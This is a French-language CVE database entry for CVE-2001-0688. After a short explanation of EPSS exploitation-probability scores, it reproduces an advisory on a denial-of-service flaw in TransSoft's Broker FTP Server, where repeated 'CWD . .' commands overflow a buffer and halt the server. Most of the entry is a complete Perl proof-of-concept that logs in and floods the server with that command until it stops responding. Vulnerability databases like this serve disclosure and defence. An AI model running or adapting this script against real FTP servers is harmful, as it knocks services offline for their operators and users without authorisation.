CVE-2001-0688 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/2851/info Broker is a Windows FTP server from TransSoft. Versions of Broker are vulnerable to a denial of service. A CD or CWD command, argumented by an invalid '. .' (dot-space-dot) sequence can, if repeatedly issued, create a buffer overflow causing the server to halt, requiring a restart. The extent of this issue's exploitability is currently unverified. #!/usr/bin/perl # Broker FTP Server 5.9.5.0 DoS proof of concept # # Syntax : perl brokerdos.pl <host> <port> <loginid> <loginpwd> # Impact : eventually causes an access violation in the TSFTPSRV process # the buffer overflow might be exploitable and be used to gain access # to the FTP Server hostcomputer. # # by [ByteRage] <[email protected]> # www.byterage.cjb.net (http://elf.box.sk/byterage/) use IO::Socket; $loginid = "anonymous"; $loginpwd = "anonymous"; if (!($host = $ARGV[0])) { $host = "127.0.0.1"; } print "Logging on @ $host:"; if (!($port = $ARGV[1])) { $port = "21"; } print "$port\n\n"; if (!($loginid = $ARGV[2])) { $loginid = "anonymous"; } if (!($loginpwd = $ARGV[3])) { $loginpwd = "anonymous"; } $SOCK = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Couldn't create socket !"; $SOCK->autoflush(); # get daemon banner $reply = ""; sysread($SOCK, $reply, 2000); print $reply; # login syswrite $SOCK, "USER $loginid\015\012"; sysread($SOCK, $reply, 2000); print $reply; syswrite $SOCK, "PASS $loginpwd\015\012"; sysread($SOCK, $reply, 2000); print $reply; sysread($SOCK, $reply, 2000); print "$reply\nSending crash ["; if (substr($reply,0,1) == '2') { # Login succesful, send CWD's $i = 1; while ($i) { $i = syswrite $SOCK, "CWD . .\015\012"; print "."; sleep(1); } print "]\nSocket write failed... possible cause : Host down :(\n"; } close($SOCK); exit();